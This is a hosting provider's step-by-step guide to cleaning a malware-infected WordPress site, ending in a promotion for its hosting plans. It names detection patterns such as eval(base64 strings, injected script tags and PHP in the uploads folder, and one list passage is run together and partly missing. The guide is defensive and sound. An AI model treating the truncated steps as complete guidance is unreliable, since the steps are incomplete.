Your site has been flagged for malware, Google is showing a warning to visitors, or your host has suspended the account. Here's how to clean the infection methodically, get warnings removed, and prevent reinfection. The single most important thing to understand: cleaning malware without identifying how the attacker got in means they'll be back within days through the same door.
WordPress malware takes several common forms. Redirect malware sends visitors (or just search engine bots) to spam or phishing pages while showing you the normal site. Backdoors are hidden PHP files or code injections that let attackers re-enter the site at will, even after you change passwords. SEO spam injects links to pharmaceutical, gambling, or other spam sites into your page content or database to manipulate search rankings. Cryptominers run JavaScript in visitors' browsers to mine cryptocurrency. Credential harvesters intercept login form submissions.
Knowing which type you have helps you know where to look. Redirect malware often lives in .htaccess or wp-config.php. Backdoors are frequently found in the uploads directory or disguised as plugin files. SEO spam is typically in the database or injected into theme files.
Counterintuitive advice when your site is infected, but necessary for two reasons. First, if cleanup goes wrong and the site breaks, you need to restore to a known state. Second, the infected files contain forensic evidence of how the attack occurred, modification timestamps, injected code, and access log patterns that help you find and close the entry point. Delete the malware before you've identified the entry point and you may destroy the evidence you need.
Take a full backup via your host's control panel or via FTP. Label it clearly as a pre-cleanup backup containing infected files, so you don't accidentally restore it later thinking it's clean.
Change every password associated with the site before touching anything else: WordPress admin password (for all admin accounts), FTP/SFTP password, database password (update wp-config.php after changing it), and hosting control panel password. If any admin accounts exist that you didn't create, delete them now, these are backdoor accounts left by the attacker. Check Users > All Users in wp-admin for unfamiliar accounts.
If the attacker still has valid credentials, they can re-enter and undo your cleanup work as you do it. Lock them out first.
Install Wordfence Security and run a full scan (Wordfence > Scan > Start New Scan). Wordfence compares every WordPress core file against official WordPress.org checksums, every plugin and theme file against known-good versions in its repository, and scans all PHP files for known malware signatures. It will flag: modified core files (these need to be restored, not just noted), files containing known malware code (delete or clean), and files in unexpected locations like PHP in the uploads directory (delete).
Also run Sucuri SiteCheck (sitecheck.sucuri.net) as an external check. It scans your site's public-facing output for blacklist status, visible malware, and known malware indicators in the HTML. Since Wordfence works server-side and Sucuri SiteCheck works externally, they complement each other, Wordfence finds server-side infections, Sucuri SiteCheck confirms what visitors and search engines are actually seeing.
Download the exact same version of WordPress you're running from wordpress.org (check your current version in Dashboard > Updates). Extract the downloaded ZIP. Via FTP, upload the wp-admin and wp-includes directories entirely, overwriting existing files. Do not overwrite wp-config.php or the wp-content directory, those contain your unique configuration and content.
Also upload the root-level PHP files from the fresh WordPress download (wp-login.php, wp-cron.php, etc.), overwriting existing versions. This ensures any modified core files are replaced with verified clean versions without touching your content.
This is where most malware hides, because wp-content is site-specific and isn't overwritten when WordPress is updated.
eval() calls on encoded data, and unfamiliar function names. Delete all non-active themes.wp-content/uploads/, every PHP file in there is malware. Legitimate uploads are images, PDFs, and documents, never PHP. Delete any PHP files found. Be thorough, attackers sometimes nest them in subdirectories or give them image-like names such as image.php.Malware frequently injects content into the database. Open phpMyAdmin and check the following in your WordPress database:
wp_options table: Look at the siteurl and home values, if they point to unfamiliar domains, the attacker changed them. Check widget settings and theme settings for injected JavaScript.wp_posts table: Run a search for suspicious strings like <script, known spam domains, or eval(base64 in the post_content column.wp_users table: Verify no unfamiliar admin accounts exist. Cross-reference with Users > All Users in wp-admin.The Better Search Replace plugin makes database-wide search for suspicious strings practical without writing SQL queries. Use it to search for known spam domains you found in the site, then manually review each result before removing.
Check your server access logs in cPanel (Metrics > Raw Access Logs). Look for: POST requests to PHP files in the uploads directory (a sign of a file upload exploit), large volumes of requests to wp-login.php or xmlrpc.php before the infection date, requests to plugin-specific PHP files that suggest exploitation of a known vulnerability, and successful POST requests from unfamiliar IPs during unusual hours.
Cross-reference suspicious log timestamps with your plugin update history. Check WPScan Vulnerability Database (wpscan.com/plugins) for the versions of your installed plugins, if a vulnerability was disclosed around the time of your infection, that's your likely entry point. Update the vulnerable plugin or replace it with an actively maintained alternative.
If Google flagged your site in Search Console, once cleanup is complete, go to Security & Manual Actions > Security Issues and click "Request Review." Describe clearly what was found, what you removed, and what you've done to prevent recurrence. Be specific, vague requests are more likely to be rejected. Google typically reviews within 24 to 72 hours for security issues and removes the warning once the site is confirmed clean. If the review is rejected, something was missed, run another scan before resubmitting.
For sites with daily backups, restoring to a pre-infection snapshot is often faster and more reliable than manual cleanup. HostBible includes daily backups with offsite storage on all plans.
View Hosting Plans